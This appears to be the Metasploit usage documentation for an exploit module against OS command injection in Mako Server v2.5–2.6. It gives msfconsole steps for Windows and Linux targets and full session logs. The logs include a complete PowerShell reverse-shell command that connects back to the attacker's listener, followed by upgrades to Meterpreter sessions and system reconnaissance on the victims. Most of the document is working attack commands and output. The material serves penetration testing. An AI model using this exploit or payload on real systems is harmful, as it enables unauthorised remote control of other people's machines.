## Vulnerable Application This module exploits a vulnerability found in Mako Server v2.5, 2.6. It's possible to inject arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Attacker input will be saved on the victims machine and can be executed by sending a GET request to manage.lsp. Based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3391 [Mako Server](https://makoserver.net) is an application framework for designing web and IoT applications. This module has been verified against the following Mako Server versions for Windows XP SP3, Windows 7 SP1 and Linux Ubuntu 16.04 LTS: - v2.5 - v2.6 Links: - [Windows x86 installer](https://makoserver.net/download/mako.windows.x86.exe) - [Windows download page](https://makoserver.net/download/windows) - [Linux x64 installer](https://makoserver.net/download/mako.linux-x64.tar.gz) - [Linux download page](https://makoserver.net/download/linux-x86) - [Documentation](https://makoserver.net/download/manual) ## Verification Steps ### Windows 1. Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (with Powershell for this example to work) 2. After installer finishes, double click the "Mako-Demo" shortcut on the desktop 4. Start msfconsole on host 5. Do: ```use exploit/multi/http/makoserver_cmd_exec``` 6. Do: ```set RHOST ``` 7. Do: ```set PAYLOAD cmd/windows/reverse_powershell``` 8. Do: ```set LHOST ``` 9. Do: ```exploit``` 10. You should get a Windows command shell ## Verification Steps ### Linux 1. Extract the "mako.linux-x64.tar.gz" on a Linux Ubuntu 16.04 LTS (x64) target (with Python for this example to work) 2. From inside the extracted folder, do ```./rundemo.sh``` 4. Start msfconsole on host 5. Do: ```use exploit/multi/http/makoserver_cmd_exec``` 6. Do: ```set RHOST ``` 7. Do: ```set PAYLOAD cmd/unix/python_reverse``` 8. Do: ```set LHOST ``` 9. Do: ```exploit``` 10. You should get a Linux command shell (may need to wait ~30 seconds) ## Scenarios ``` msf > use exploit/multi/http/makoserver_cmd_exec msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3 RHOST => 10.10.10.3 msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell PAYLOAD => cmd/windows/reverse_powershell msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2 LHOST => 10.10.10.2 msf exploit(makoserver_cmd_exec) > exploit [*] Started reverse TCP handler on 10.10.10.2:4444 [*] Sending payload to target... [*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49175) at 2017-10-26 21:23:59 -0400 Microsoft Windows Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\Smith\Downloads\MakoServer> ``` ### Verbose Output ``` msf > use exploit/multi/http/makoserver_cmd_exec msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3 RHOST => 10.10.10.3 msf exploit(makoserver_cmd_exec) > set VERBOSE true VERBOSE => true msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell PAYLOAD => cmd/windows/reverse_powershell msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2 LHOST => 10.10.10.2 msf exploit(makoserver_cmd_exec) > check [*] Trying to detect running Mako Server and necessary files... [*] Mako Server save.lsp returns correct ouput. [*] 10.10.10.3:80 The target appears to be vulnerable. msf exploit(makoserver_cmd_exec) > exploit [*] Started reverse TCP handler on 10.10.10.2:4444 [*] Sending payload to target... [*] Now executing the following command: os.execute([[powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='10.10.10.2';$p='4444';$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};]]) [*] Sending PUT request to save.lsp... [*] Sending GET request to manage.lsp... [*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49174) at 2017-10-26 21:21:08 -0400 Microsoft Windows Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\Smith\Downloads\MakoServer> ``` ### Targeting Windows 7 SP1 x64 running Mako Server v2.5 A typical scenario would be to obtain a Windows command shell and then upgrade to a Meterpreter session: ``` msf > use exploit/multi/http/makoserver_cmd_exec msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2 RHOST => 10.10.10.2 msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell PAYLOAD => cmd/windows/reverse_powershell msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4 LHOST => 10.10.10.4 msf exploit(makoserver_cmd_exec) > check [*] 10.10.10.2:80 The target appears to be vulnerable. msf exploit(makoserver_cmd_exec) > exploit [*] Started reverse TCP handler on 10.10.10.4:4444 [*] Sending payload to target... [*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:49189) at 2017-10-25 20:57:56 -0400 Microsoft Windows Copyright (c) Microsoft Corporation. All rights reserved. C:\Users\Smith\Downloads\MakoServer>^Z Background session 1? [y/N] y msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter msf post(shell_to_meterpreter) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell cmd/windows 10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2) msf post(shell_to_meterpreter) > set SESSION 1 SESSION => 1 msf post(shell_to_meterpreter) > set LPORT 8080 LPORT => 8080 msf post(shell_to_meterpreter) > exploit [*] Upgrading session ID: 1 [*] Starting exploit/multi/handler [*] Started reverse TCP handler on 10.10.10.4:8080 [-] Powershell is not installed on the target. [*] Command stager progress: 1.66% (1699/102108 bytes) ... [*] Command stager progress: 100.00% (102108/102108 bytes) [*] Post module execution completed msf post(shell_to_meterpreter) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell cmd/windows 10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2) 2 meterpreter x86/windows smith-PC\smith @ SMITH-PC 10.10.10.4:8080 -> 10.10.10.2:49190 (10.10.10.2) msf post(shell_to_meterpreter) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getuid Server username: smith-PC\smith meterpreter > sysinfo Computer : SMITH-PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows ``` ### Linux Ubuntu 16.04 LTS x64 running Mako Server v2.5 A typical scenario would be to obtain a Linux command shell and then upgrade to a Meterpreter session: ``` msf > use exploit/multi/http/makoserver_cmd_exec msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2 RHOST => 10.10.10.2 msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/unix/reverse_python PAYLOAD => cmd/unix/reverse_python msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4 LHOST => 10.10.10.4 msf exploit(makoserver_cmd_exec) > check [*] 10.10.10.2:80 The target appears to be vulnerable. msf exploit(makoserver_cmd_exec) > exploit [*] Started reverse TCP handler on 10.10.10.4:4444 [*] Sending payload to target... [*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:57888) at 2017-11-10 15:52:33 -0500 ls LICENSE.txt mako mako.zip README.txt rundemo.sh tutorial ^Z Background session 1? [y/N] y msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter msf post(shell_to_meterpreter) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell cmd/unix 10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2) msf post(shell_to_meterpreter) > set SESSION 1 SESSION => 1 msf post(shell_to_meterpreter) > set LPORT 8080 LPORT => 8080 msf post(shell_to_meterpreter) > exploit [*] Upgrading session ID: 1 [*] Starting exploit/multi/handler [*] Started reverse TCP handler on 10.10.10.4:8080 [*] Sending stage (847604 bytes) to 10.10.10.2 [*] Meterpreter session 2 opened (10.10.10.4:8080 -> 10.10.10.2:60448) at 2017-11-10 15:54:38 -0500 [*] Command stager progress: 100.00% (736/736 bytes) [*] Post module execution completed msf post(shell_to_meterpreter) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell cmd/unix 10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2) 2 meterpreter x86/linux uid=1000, gid=1000, euid=1000, egid=1000 @ 10.10.10.2 10.10.10.4:8080 -> 10.10.10.2:60448 (10.10.10.2) msf post(shell_to_meterpreter) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getuid Server username: uid=1000, gid=1000, euid=1000, egid=1000 meterpreter > sysinfo Computer : 10.10.10.2 OS : Ubuntu 16.04 (Linux 4.10.0-35-generic) Architecture : x64 Meterpreter : x86/linux ```